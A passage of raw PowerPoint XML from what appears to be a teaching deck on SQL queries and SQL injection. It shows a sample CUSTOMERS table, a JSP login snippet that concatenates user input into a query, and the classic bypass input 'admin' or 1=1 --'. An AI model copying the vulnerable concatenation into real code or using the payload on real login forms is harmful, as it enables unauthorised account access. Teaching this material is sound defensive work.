          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SQL&gt; SELECT ID, NAME, SALARY </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FROM CUSTOMERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WHERE SALARY &gt; 2000 OR age &lt; 25;</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ID | NAME     | AGE | ADDRESS   | SALARY   |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+----+----------+-----+-----------+----------+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  3 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kaushik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  |  23 | Kota      |  2000.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  4 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Chaitali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> |  25 | Mumbai    |  6500.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  5 | Hardik   |  27 | Bhopal    |  8500.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  6 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Komal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    |  22 | MP        |  4500.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>|  7 | Muffy    |  24 | Indore    | 10000.00 |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+----+----------+-----+-----------+----------+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19652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152400" y="508001"/>
            <a:ext cx="8991600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Legitimate access to an account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34818" name="Picture 2">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340835" y="1691368"/>
            <a:ext cx="8171793" cy="4773996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28774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152400" y="587375"/>
            <a:ext cx="8991600" cy="552450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Legitimate access to an account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3686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391887" y="1771420"/>
            <a:ext cx="8360228" cy="4852314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370773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0" y="522514"/>
            <a:ext cx="8991600" cy="733425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Access to an account through SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12290"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228600" y="1982106"/>
            <a:ext cx="8534400" cy="4520293"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4135214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152401" y="537029"/>
            <a:ext cx="8991599" cy="733425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Access through an SQL Injection attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3686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100012" y="1457552"/>
            <a:ext cx="8943975" cy="5191125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399405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419100" y="580571"/>
            <a:ext cx="8466083" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Web application vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="2090057"/>
            <a:ext cx="8305800" cy="4593772"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Input processing code resides at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and response pages are generated at the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>side</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Vulnerabilities may be present in both sides</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Specific flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in server side code (inputs not filtered properly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Inherent features of browser (cookies stored for longer time period)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>alter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="832545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a:xfrm>
            <a:off x="304800" y="558386"/>
            <a:ext cx="8686799" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Example of JSP code with vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="217094" name="Group 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="4294967295"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2197330655"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="259896" y="1525173"/>
          <a:ext cx="8458200" cy="3122023"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8458200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3122023">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1. String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LoginAction</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HttpServletRequest</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request, ...) throws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IOException</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2.    String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sLogin</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getParam</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(request, "Login");</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3.    String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sPassword</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getParam</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(request, "Password");</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4.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java.sql.ResultSet</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rs</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null;</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5.    String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qry</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"select member_id, member_level from members where ";</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6.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qry</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qry</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“member_login =’” + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FF3300"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>sLogin</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 and member_password =’”  + </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FF3300"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>sPassword</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7.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java.sql.ResultSet</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rs</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stat.executeQuery</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qry</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8.    if  (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="0000CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>rs.next</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 { // Login and password passed       </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nb-NO" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="0000CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>9.          session.setAttribute ("UserID", rs.getString(1));</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="0000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nb-NO" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="0000CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>             </a:t>
                      </a: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Pct val="75000"/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="0000CC"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>       }</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="0000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06890" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1979839" y="4279173"/>
            <a:ext cx="2046513" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>admin’ or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506891" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7194096" y="4235716"/>
            <a:ext cx="1143000" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>blank</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506892" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2888796" y="2979303"/>
            <a:ext cx="876300" cy="1332614"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506893" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7346496" y="3016516"/>
            <a:ext cx="359229" cy="1295401"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506894" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="412296" y="4692916"/>
            <a:ext cx="8327571" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>select member_id, member_level from members </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>where member_login =’admin’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’ and member_password =’’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="506895" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4298496" y="5302516"/>
            <a:ext cx="0" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
